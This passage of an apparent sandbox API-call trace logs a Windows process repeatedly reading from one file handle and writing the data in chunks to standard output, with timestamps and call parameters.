nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.095] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.095] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] GetFileType (hFile=0x50) returned 0x1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.095] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.096] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.096] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] GetFileType (hFile=0x50) returned 0x1 [0193.096] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.096] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.097] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.097] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.097] GetFileType (hFile=0x50) returned 0x1 [0193.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.098] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.098] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.098] GetFileType (hFile=0x50) returned 0x1 [0193.098] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.099] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.099] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.099] GetFileType (hFile=0x50) returned 0x1 [0193.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] GetFileType (hFile=0x50) returned 0x1 [0193.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.100] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.100] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.101] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.101] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] GetFileType (hFile=0x50) returned 0x1 [0193.101] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.101] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.102] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.102] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30ef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30efdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30efdc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30f02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f02c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30f07c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f07c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] GetFileType (hFile=0x50) returned 0x1 [0193.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.102] WriteFile (in: hFile=0x50, lpBuffer=0x30f0cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f0cc*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30f11c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f11c*, lpNumberOfBytesWritten=0x30e170*=0x50, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] GetFileType (hFile=0x50) returned 0x1 [0193.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.103] WriteFile (in: hFile=0x50, lpBuffer=0x30f16c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e170, lpOverlapped=0x0 | out: lpBuffer=0x30f16c*, lpNumberOfBytesWritten=0x30e170*=0x20, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.103] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e15c | out: lpNewFilePointer=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=4) returned 0x58 [0193.103] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.103] _get_osfhandle (_FileHandle=1) returned 